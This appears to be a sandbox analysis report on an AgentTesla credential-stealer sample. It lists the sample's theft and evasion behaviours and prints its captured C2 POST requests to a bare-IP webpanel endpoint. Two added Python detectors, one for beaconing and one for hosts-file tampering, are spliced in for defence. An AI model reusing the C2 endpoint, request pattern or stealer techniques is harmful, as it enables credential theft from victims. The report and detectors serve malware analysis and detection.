Analysis Report file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:339128
MD5:2e1fcfb191508fc51320313d059bd30d
SHA1:18254fc83a340ca9562844542425ed7f995bff4a
SHA256:5dd60a5a2e5f074435cb438d3e229d1a3c4e4ef35c9c886a356b52aeb83265cd
Tags:exe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains very large array initializations
Installs a global keyboard hook
Machine Learning detection for sample
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • file.exe (PID: 5448 cmdline: 'C:\Users\user\Desktop\file.exe' MD5: 2E1FCFB191508FC51320313D059BD30D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(2 further entries not shown in the report)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.file.exe.8d0000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.0.file.exe.8d0000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: file.exe | Avira: detected

Multi AV Scanner detection for submitted file
Source: file.exe | Virustotal: Detection: 53%
Source: file.exe | ReversingLabs: Detection: 47%

Machine Learning detection for sample
Source: file.exe | Joe Sandbox ML: detected

Source: file.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: file.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mscorrc.pdb | source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp
Source: global traffic | HTTP traffic detected: 95 POST requests to the same endpoint. Request line and headers common to all 95 requests (only Content-Length varies, plus a Connection header on the first request):

POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 64.188.18.218
Content-Length: (per request, see below)
Expect: 100-continue

Request(s) | Content-Length | Additional header
1 | 376 | Connection: Keep-Alive
2-4 | 376 |
5-7 | 378 |
8-19 | 376 |
20 | 378 |
21-23 | 376 |
24-26 | 378 |
27-44 | 376 |
45-46 | 378 |
47-53 | 376 |
54-55 | 378 |
56-58 | 376 |
59 | 380 |
60-79 | 376 |
80 | 574 |
81 | 3420 |
82-90 | 376 |
91 | 378 |
92-94 | 376 |
95 | 380 |
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continueConnection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 64.188.18.218 (reported 50 times; identical rows collapsed)
Source: unknown | HTTP traffic detected:
  POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
  Content-Type: application/x-www-form-urlencoded
  Host: 64.188.18.218
  Content-Length: 376
  Expect: 100-continue
  Connection: Keep-Alive
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmp | String found in binary or memory: http://64.188.18.218
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php127.0.0.1POST
Source: file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmp | String found in binary or memory: http://64.188.18.218x&
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: http://ymuZnB.com
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%(
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: file.exe, 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp | String found in binary or memory: https://qL4JAKSuGatRwuRZIZxu.com
Source: file.exe | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
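The traffic rows above carry four traits a network detection can key on: the Host header is a bare IP, no DNS query preceded the connection, the POST bodies are almost the same size every time, and a Firefox User-Agent is combined with "Expect: 100-continue", a header browsers do not send but which the .NET HttpWebRequest client adds to POSTs by default. The following is an added example, not part of the sandbox report or of the sample: a small detector that scores those traits over a constructed, pipe-separated event log (the log lines, the benign hosts and the 203.0.113.7 entry are made up for contrast; only the C2 IP, path and User-Agent string are copied from the rows above).

```python
"""Flag C2-style beaconing in a simple HTTP/DNS event log.

Added example (not from the sandbox report). Traits scored: repeated POSTs to a
Host header that is a bare IP, no DNS resolution for that host, a near-constant
body size, and a browser User-Agent paired with "Expect: 100-continue", which
browsers never send but .NET's HttpWebRequest adds to POSTs by default.
"""
import ipaddress
from collections import defaultdict

FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
C2_PATH = "/webpanel-trade/inc/eea5c8636b504d.php"

# Constructed sample events, one per line, pipe-separated:
#   seq|DNS|qname
#   seq|HTTP|method|host|path|user_agent|content_length|expect_100_continue(0/1)
# The six POSTs mimic the report's rows; the other entries are invented for contrast.
SAMPLE_LOG = "\n".join([
    "1|DNS|www.example.com",
    f"2|HTTP|GET|www.example.com|/|{FIREFOX_UA}|0|0",
    f"3|HTTP|POST|64.188.18.218|{C2_PATH}|{FIREFOX_UA}|376|1",
    "4|DNS|api.ipify.org",
    f"5|HTTP|GET|api.ipify.org|/|{FIREFOX_UA}|0|0",
    f"6|HTTP|POST|64.188.18.218|{C2_PATH}|{FIREFOX_UA}|376|1",
    f"7|HTTP|POST|64.188.18.218|{C2_PATH}|{FIREFOX_UA}|378|1",
    f"8|HTTP|POST|64.188.18.218|{C2_PATH}|{FIREFOX_UA}|376|1",
    f"9|HTTP|POST|64.188.18.218|{C2_PATH}|{FIREFOX_UA}|380|1",
    f"10|HTTP|POST|64.188.18.218|{C2_PATH}|{FIREFOX_UA}|376|1",
    "11|HTTP|GET|203.0.113.7|/update.bin|Wget/1.21|0|0",
])


def is_bare_ip(host):
    """True when the Host header is an IP literal (IPv4 or bracketed IPv6) rather than a name."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def parse_events(log_text):
    """Parse the pipe-separated format above into dicts, ordered by sequence number."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = line.split("|")
        seq, kind = int(f[0]), f[1]
        if kind == "DNS":
            events.append({"seq": seq, "kind": kind, "qname": f[2].lower()})
        elif kind == "HTTP":
            events.append({
                "seq": seq, "kind": kind, "method": f[2], "host": f[3].lower(),
                "path": f[4], "ua": f[5], "clen": int(f[6]), "expect100": f[7] == "1",
            })
    return sorted(events, key=lambda e: e["seq"])


def analyze(log_text, min_posts=5, max_len_spread=8):
    """Return one finding per (host, path) that shows beacon-like traits, strongest first."""
    resolved = set()
    by_endpoint = defaultdict(list)
    for ev in parse_events(log_text):
        if ev["kind"] == "DNS":
            resolved.add(ev["qname"])        # only names resolved BEFORE a request count
            continue
        ev["bare_ip"] = is_bare_ip(ev["host"])
        ev["no_dns"] = ev["host"] not in resolved
        by_endpoint[(ev["host"], ev["path"])].append(ev)

    findings = []
    for (host, path), reqs in by_endpoint.items():
        reasons = []
        if all(r["bare_ip"] for r in reqs):
            reasons.append("Host header is a bare IP")
        if all(r["no_dns"] for r in reqs):
            reasons.append("no DNS resolution preceded the requests")
        posts = [r for r in reqs if r["method"] == "POST"]
        if posts and len(posts) >= min_posts:
            sizes = [r["clen"] for r in posts]
            if max(sizes) - min(sizes) <= max_len_spread:
                reasons.append(f"{len(posts)} POSTs with near-constant body size "
                               f"({min(sizes)}-{max(sizes)} bytes)")
        if any(r["ua"].startswith("Mozilla/") and r["expect100"] for r in reqs):
            reasons.append("browser User-Agent combined with Expect: 100-continue "
                           "(.NET HttpWebRequest default, not browser behaviour)")
        if reasons:
            findings.append({"host": host, "path": path,
                             "requests": len(reqs), "reasons": reasons})
    findings.sort(key=lambda f: (-len(f["reasons"]), f["host"]))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['host']}{f['path']}: {f['requests']} request(s)")
        for r in f["reasons"]:
            print("  -", r)
```

The DNS check is order-sensitive on purpose: a name resolved after the first request to it is as suspicious as one never resolved, which is what the "TCP traffic detected without corresponding DNS query" rows record. The 203.0.113.7 fetch is still reported (bare IP, no DNS) but ranks below the endpoint that shows all four traits; tune `min_posts` and `max_len_spread` to the beacon cadence you expect.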

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\file.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts
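The report records only that the sample wrote to the hosts file, not what it wrote, so the check a responder wants is a listing of every active entry with a verdict. On a default install that file contains only comments (the localhost lines are commented out) and is writable only by Administrators and SYSTEM, so any active entry is non-default and a successful write implies elevated rights worth confirming in the process tree. The following auditor is an added example, not part of the report or the sample: the hosts content it parses is constructed, the vendor watchlist is illustrative, and the severities are the author's choice.

```python
"""Audit a Windows hosts file for sinkhole and redirect entries.

Added example (not part of the sandbox report, which records only that the
sample wrote to the hosts file). A stock Windows hosts file contains nothing but
comments, so every active entry deserves a verdict. The watchlist below is
illustrative, not exhaustive.
"""
import ipaddress

WINDOWS_HOSTS = r"C:\Windows\System32\drivers\etc\hosts"

# Names that legitimately map to loopback on a normal machine.
BENIGN_LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

# Illustrative watchlist: update and security-vendor domains that malware commonly
# null-routes so the victim can neither fetch signatures nor submit samples.
SECURITY_SUFFIXES = (
    "virustotal.com", "windowsupdate.com", "microsoft.com", "symantec.com",
    "kaspersky.com", "avast.com", "eset.com", "malwarebytes.com", "sophos.com",
)

# Constructed sample content (NOT recovered from the analysed sample): the stock
# header plus three attacker-style entries.
HOSTS_SAMPLE = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 127.0.0.1       localhost
# ::1             localhost
127.0.0.1       localhost
::1             localhost
0.0.0.0         www.virustotal.com
127.0.0.1       update.example-av.test   # constructed: blocks an AV update host
198.51.100.20   login.bank.example        # constructed: pharming-style redirect
"""


def parse_hosts(text):
    """Yield (line_number, ip_string, [names]) for each active, non-comment entry."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) >= 2:
            yield lineno, fields[0], [n.lower() for n in fields[1:]]


def _watchlisted(name):
    return any(name == s or name.endswith("." + s) for s in SECURITY_SUFFIXES)


def audit_hosts(text):
    """Classify every active entry as 'sinkhole', 'redirect' or 'malformed'."""
    findings = []
    for lineno, ip_text, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(ip_text)
        except ValueError:
            findings.append({"line": lineno, "ip": ip_text, "name": " ".join(names),
                             "kind": "malformed", "severity": "low"})
            continue
        nulled = ip.is_loopback or ip.is_unspecified   # 127.x, ::1, 0.0.0.0
        for name in names:
            if nulled and name in BENIGN_LOOPBACK_NAMES:
                continue
            if nulled:
                kind = "sinkhole"
                severity = "high" if _watchlisted(name) else "medium"
            else:
                kind, severity = "redirect", "high"   # name sent to an attacker-chosen host
            findings.append({"line": lineno, "ip": ip_text, "name": name,
                             "kind": kind, "severity": severity})
    return findings


def audit_file(path=WINDOWS_HOSTS):
    """Read a hosts file from disk (read access is enough) and audit it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_hosts(fh.read())


if __name__ == "__main__":
    for f in audit_hosts(HOSTS_SAMPLE):
        print(f"line {f['line']}: {f['kind']:9} {f['severity']:6} {f['ip']} -> {f['name']}")
```

Run `audit_file()` on a suspect host to get the same verdicts for the live file; pair it with the file's modification time, since a hosts file changed at the same moment the sample ran is itself a strong indicator.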

System Summary:

.NET source code contains very large array initializations
Source: file.exe, <PrivateImplementationDetails>{E8C26188-0CCB-4AC0-8B11-8FD1685A3376}/DD56AB72-C86B-4D01-AE5F-AD08782C2927.cs | Large array initialization: .cctor: array initializer size 12062
Source: 0.0.file.exe.8d0000.0.unpack, <PrivateImplementationDetails>{E8C26188-0CCB-4AC0-8B11-8FD1685A3376}/DD56AB72-C86B-4D01-AE5F-AD08782C2927.cs | Large array initialization: .cctor: array initializer size 12062
Source: 0.2.file.exe.8d0000.0.unpack, <PrivateImplementationDetails>{E8C26188-0CCB-4AC0-8B11-8FD1685A3376}/DD56AB72-C86B-4D01-AE5F-AD08782C2927.cs | Large array initialization: .cctor: array initializer size 12062
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010DB0BA NtQuerySystemInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010DB089 NtQuerySystemInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD1D60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DDB6C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD3608
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6A220
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6882C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6E848
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6A7AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6D110
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6D558
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02B6B190
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05847300
Source: file.exe | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.610772201.0000000000E00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx vs file.exe
Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs file.exe
Source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs file.exe
Source: file.exe, 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe4 vs file.exe
Source: file.exe, 00000000.00000002.611249212.00000000010A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe4 vs file.exe
Source: file.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: file.exe, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (reported twice)
Source: 0.0.file.exe.8d0000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (reported twice)
Source: 0.2.file.exe.8d0000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (reported twice)
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@1/2@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010DAF3E AdjustTokenPrivileges
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010DAF07 AdjustTokenPrivileges
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\jbvm20a0.pwn
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 53%
Source: file.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: file.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mscorrc.pdb | source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D24C4 push esi; ret 0_2_010D24DE
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX (reported 56 times; identical rows collapsed)

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\file.exe TID: 5716 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716 | Thread sleep count: 106 > 30
